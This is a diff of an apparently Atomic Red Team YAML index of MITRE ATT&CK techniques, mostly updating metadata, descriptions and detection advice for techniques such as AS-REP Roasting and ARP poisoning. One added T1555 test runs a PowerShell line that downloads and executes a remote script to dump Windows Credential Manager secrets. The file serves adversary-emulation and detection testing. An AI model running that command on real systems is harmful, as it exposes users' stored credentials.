+ The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ name: Valid Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -16422,13 +17055,31 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-06-20T22:44:36.043Z'
+ modified: '2020-10-19T16:01:22.724Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
+ x_mitre_version: '2.1'
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
x_mitre_platforms:
- Linux
- macOS
@@ -16439,48 +17090,21 @@ persistence:
- SaaS
- Office 365
- Azure AD
- x_mitre_effective_permissions:
- - User
- - Administrator
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: |-
- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Application control
- - System access controls
- - Anti-virus
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_version: '2.1'
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1505.003:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1505.003
- url: https://attack.mitre.org/techniques/T1505/003
- - url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
- description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down
- the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
- source_name: Lee 2013
- - url: https://www.us-cert.gov/ncas/alerts/TA15-314A
- description: US-CERT. (2015, November 13). Compromised Web Servers and Web
- Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.
- source_name: US-CERT Alert TA15-314A Web Shells
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Web Shell
+ created: '2019-12-13T16:46:18.927Z'
+ modified: '2020-09-16T19:34:19.752Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ type: attack-pattern
+ id: attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb
description: "Adversaries may backdoor web servers with web shells to establish
persistent access to systems. A Web shell is a Web script that is placed on
an openly accessible Web server to allow an adversary to use the Web server
@@ -16489,21 +17113,34 @@ persistence:
addition to a server-side script, a Web shell may have a client interface
program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020)
Web shell client).(Citation: Lee 2013) "
- id: attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- modified: '2020-04-17T17:47:56.673Z'
- created: '2019-12-13T16:46:18.927Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_system_requirements:
- - Adversary access to Web server with vulnerability or account to upload and
- serve the Web shell file.
- x_mitre_permissions_required:
- - SYSTEM
- - User
+ name: Web Shell
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1505.003
+ url: https://attack.mitre.org/techniques/T1505/003
+ - external_id: CAPEC-650
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/650.html
+ - source_name: Lee 2013
+ description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down
+ the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
+ url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
+ - url: https://www.us-cert.gov/ncas/alerts/TA15-314A
+ description: US-CERT. (2015, November 13). Compromised Web Servers and Web
+ Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.
+ source_name: US-CERT Alert TA15-314A Web Shells
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_data_sources:
+ - Process monitoring
+ - Netflow/Enclave netflow
+ - File monitoring
+ - Authentication logs
x_mitre_detection: "Web shells can be difficult to detect. Unlike other forms
of persistent remote access, they do not initiate connections. The portion
of the Web shell that is on the server may be small and innocuous looking.
@@ -16517,15 +17154,14 @@ persistence:
Log authentication attempts to the server and any unusual traffic patterns
to or from the server and internal network. (Citation: US-CERT Alert TA15-314A
Web Shells) "
- x_mitre_data_sources:
- - Process monitoring
- - Netflow/Enclave netflow
- - File monitoring
- - Authentication logs
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
+ x_mitre_permissions_required:
+ - SYSTEM
+ - User
+ x_mitre_system_requirements:
+ - Adversary access to Web server with vulnerability or account to upload and
+ serve the Web shell file.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.1'
identifier: T1505.003
atomic_tests:
- name: Web Shell Written to Disk
@@ -16708,6 +17344,15 @@ persistence:
- source_name: mitre-attack
external_id: T1543.003
url: https://attack.mitre.org/techniques/T1543/003
+ - external_id: CAPEC-478
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/478.html
+ - external_id: CAPEC-550
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/550.html
+ - external_id: CAPEC-551
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/551.html
- url: https://technet.microsoft.com/en-us/library/cc772408.aspx
description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
source_name: TechNet Services
@@ -16729,12 +17374,12 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T22:22:10.041Z'
+ modified: '2020-09-16T15:49:58.490Z'
created: '2020-01-17T19:13:50.402Z'
x_mitre_platforms:
- Windows
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: "Monitor processes and command-line arguments for actions
that could create or modify services. Command-line invocation of tools capable
of adding or modifying services may be unusual, depending on how systems are
@@ -17081,6 +17726,166 @@ credential-access:
'
name: sh
+ T1557.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1557.002
+ url: https://attack.mitre.org/techniques/T1557/002
+ - source_name: RFC826 ARP
+ url: https://tools.ietf.org/html/rfc826
+ description: Plummer, D. (1982, November). An Ethernet Address Resolution
+ Protocol. Retrieved October 15, 2020.
+ - source_name: Sans ARP Spoofing Aug 2003
+ url: https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411
+ description: Siles, R. (2003, August). Real World ARP Spoofing. Retrieved
+ October 15, 2020.
+ - source_name: Cylance Cleaver
+ description: Cylance. (2014, December). Operation Cleaver. Retrieved September
+ 14, 2017.
+ url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: ARP Cache Poisoning
+ description: |
+ Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
+
+ The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.
+
+ An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.
+
+ The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
+
+ Adversaries may use ARP cache poisoning as a means to man-in-the-middle (MiTM) network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
+ id: attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-16T15:22:11.604Z'
+ created: '2020-10-15T12:05:58.755Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
+ ARP replies may be suspicious. \n\nConsider collecting changes to ARP caches
+ across endpoints for signs of ARP poisoning. For example, if multiple IP addresses
+ map to a single MAC address, this could be an indicator that the ARP cache
+ has been poisoned."
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_contributors:
+ - Jon Sternstein, Stern Security
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ atomic_tests: []
+ T1558.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1558.004
+ url: https://attack.mitre.org/techniques/T1558/004
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
+ 24, 2020.
+ - source_name: Microsoft Kerberos Preauth 2014
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ source_name: SANS Attacking Kerberos Nov 2014
+ url: https://redsiege.com/kerberoast-slides
+ - url: https://adsecurity.org/?p=2293
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ source_name: AdSecurity Cracking Kerberos Dec 2015
+ - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ source_name: Microsoft Detecting Kerberoasting Feb 2018
+ - source_name: Microsoft 4768 TGT 2017
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: AS-REP Roasting
+ description: "Adversaries may reveal credentials of accounts that have disabled
+ Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
+ Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) \n\nPreauthentication
+ offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002).
+ When enabled, a user requesting access to a resource initiates communication
+ with the Domain Controller (DC) by sending an Authentication Server Request
+ (AS-REQ) message with a timestamp that is encrypted with the hash of their
+ password. If and only if the DC is able to successfully decrypt the timestamp
+ with the hash of the user’s password, it will then send an Authentication
+ Server Response (AS-REP) message that contains the Ticket Granting Ticket
+ (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation:
+ Microsoft Kerberos Preauth 2014)\n\nFor each account found without preauthentication,
+ an adversary may send an AS-REQ message without the encrypted timestamp and
+ receive an AS-REP message with TGT data which may be encrypted with an insecure
+ algorithm such as RC4. The recovered encrypted data may be vulnerable to offline
+ [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks
+ similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003)
+ and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan
+ 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) \n\nAn account
+ registered to a domain, with or without special privileges, can be abused
+ to list all domain accounts that have preauthentication disabled by utilizing
+ Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001)
+ with an LDAP filter. Alternatively, the adversary may send an AS-REQ message
+ for each user. If the DC responds without errors, the account does not require
+ preauthentication and the AS-REP message will already contain the encrypted
+ data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits
+ Cracking AS-REP Roasting Jun 2019)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003),
+ [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral
+ Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation:
+ SANS Attacking Kerberos Nov 2014)"
+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-10-20T19:30:11.783Z'
+ created: '2020-08-24T13:43:00.028Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Valid domain account
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
+ TGS service ticket requests. Particularly investigate irregular patterns of
+ activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
+ a small time frame, especially if they also request RC4 encryption [Type 0x17],
+ pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
+ Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
+ Microsoft 4768 TGT 2017)'
+ x_mitre_data_sources:
+ - Windows event logs
+ - Authentication logs
+ x_mitre_contributors:
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
T1552.003:
technique:
external_references:
@@ -17183,7 +17988,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-07-09T17:01:18.302Z'
+ modified: '2020-10-21T16:38:27.781Z'
created: '2017-05-31T21:31:22.767Z'
x_mitre_platforms:
- Linux
@@ -17304,7 +18109,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-25T18:18:20.366Z'
+ modified: '2020-10-15T19:39:34.817Z'
created: '2020-02-11T18:47:46.619Z'
x_mitre_contributors:
- Praetorian
@@ -17317,7 +18122,7 @@ credential-access:
It may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_platforms:
- AWS
@@ -17460,18 +18265,7 @@ credential-access:
elevation_required: true
T1110.004:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1110.004
- url: https://attack.mitre.org/techniques/T1110/004
- - source_name: US-CERT TA18-068A 2018
- url: https://www.us-cert.gov/ncas/alerts/TA18-086A
- description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
- by Cyber Actors. Retrieved October 2, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Credential Stuffing
+ id: attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc
description: |-
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -17493,27 +18287,27 @@ credential-access:
* VNC (5900/TCP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
- id: attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc
+ name: Credential Stuffing
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1110.004
+ url: https://attack.mitre.org/techniques/T1110/004
+ - external_id: CAPEC-600
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/600.html
+ - source_name: US-CERT TA18-068A 2018
+ url: https://www.us-cert.gov/ncas/alerts/TA18-086A
+ description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
+ by Cyber Actors. Retrieved October 2, 2019.
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-29T20:35:36.694Z'
+ modified: '2020-10-19T22:43:45.475Z'
created: '2020-02-11T18:39:59.959Z'
- x_mitre_contributors:
- - Diogo Fernandes
- - Anastasios Pingios
- x_mitre_data_sources:
- - Authentication logs
- - Office 365 account logs
- x_mitre_permissions_required:
- - User
- x_mitre_detection: Monitor authentication logs for system and application login
- failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If
- authentication failures are high, then there may be a brute force attempt
- to gain access to a system using legitimate credentials.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
@@ -17524,6 +18318,20 @@ credential-access:
- Office 365
- Azure AD
- SaaS
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.1'
+ x_mitre_detection: Monitor authentication logs for system and application login
+ failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If
+ authentication failures are high, then there may be a brute force attempt
+ to gain access to a system using legitimate credentials.
+ x_mitre_permissions_required:
+ - User
+ x_mitre_data_sources:
+ - Authentication logs
+ - Office 365 account logs
+ x_mitre_contributors:
+ - Diogo Fernandes
+ - Anastasios Pingios
atomic_tests: []
T1552.001:
technique:
@@ -17689,7 +18497,39 @@ credential-access:
- File monitoring
- Process monitoring
- System calls
- atomic_tests: []
+ identifier: T1555
+ atomic_tests:
+ - name: Extract Windows Credential Manager via VBA
+ auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b
+ description: |
+ This module will extract the credentials found within the Windows credential manager and dump
+ them to $env:TEMP\windows-credentials.txt
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft Word must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "word.Application" | Out-Null
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
+ to meet this requirement"
+
+'
+ executor:
+ command: |
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
+ cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction
+ Ignore
+
+'
+ name: powershell
T1555.003:
technique:
created: '2020-02-12T18:57:36.041Z'
@@ -18041,11 +18881,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Controller Authentication
- description: "Adversaries may patch the authentication process on a domain control
+ description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
- process on a domain control with the intent of creating a backdoor used to
- access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)).
+ process on a domain controller with the intent of creating a backdoor used
+ to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)).
Skeleton key works through a patch on an enterprise domain controller authentication
process (LSASS) with credentials that adversaries may use to bypass the standard
authentication system. Once patched, an adversary can use the injected password
@@ -18060,7 +18900,7 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-25T20:51:30.829Z'
+ modified: '2020-08-26T14:16:48.125Z'
created: '2020-02-11T19:05:02.399Z'
x_mitre_data_sources:
- Authentication logs
@@ -18147,22 +18987,14 @@ credential-access:
atomic_tests: []
T1187:
technique:
- id: attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Forced Authentication
- description: |-
- Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
-
- The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.
-
- Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)
-
- Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)
-
- There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:
-
- * A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
- * A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)
+ created: '2018-01-16T16:13:52.465Z'
+ modified: '2020-06-19T17:16:41.470Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1187
@@ -18196,32 +19028,40 @@ credential-access:
Threat Activity Targeting Energy and Other Critical Infrastructure Sectors.
Retrieved November 2, 2017.'
source_name: US-CERT APT Energy Oct 2017
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-06-19T17:16:41.470Z'
- created: '2018-01-16T16:13:52.465Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
+ description: |-
+ Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
- Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)
+ The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.
+
+ Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)
+
+ Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)
+
+ There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:
+
+ * A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
+ * A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)
+ name: Forced Authentication
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2
+ x_mitre_version: '1.2'
+ x_mitre_contributors:
+ - Teodor Cimpoesu
+ - Sudhanshu Chauhan, @Sudhanshu_C
x_mitre_data_sources:
- File monitoring
- Network protocol analysis
- Network device logs
- Process use of network
- x_mitre_contributors:
- - Teodor Cimpoesu
- - Sudhanshu Chauhan, @Sudhanshu_C
- x_mitre_version: '1.2'
+ x_mitre_detection: |-
+ Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
+
